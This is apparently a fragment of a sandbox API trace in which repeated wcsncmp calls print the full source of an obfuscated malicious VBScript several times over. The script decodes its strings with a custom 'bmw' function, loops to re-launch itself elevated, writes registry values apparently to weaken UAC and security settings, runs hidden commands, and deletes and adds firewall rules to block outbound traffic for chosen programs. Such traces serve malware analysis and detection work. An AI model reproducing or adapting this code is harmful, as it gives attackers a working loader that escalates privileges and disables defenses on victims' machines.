(fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0222.932] wcsncmp (_String1="ion bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0222.932] wcsncmp (_String1="on bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 98 [0222.932] wcsncmp (_String1="n bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0222.932] wcsncmp (_String1=" bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", 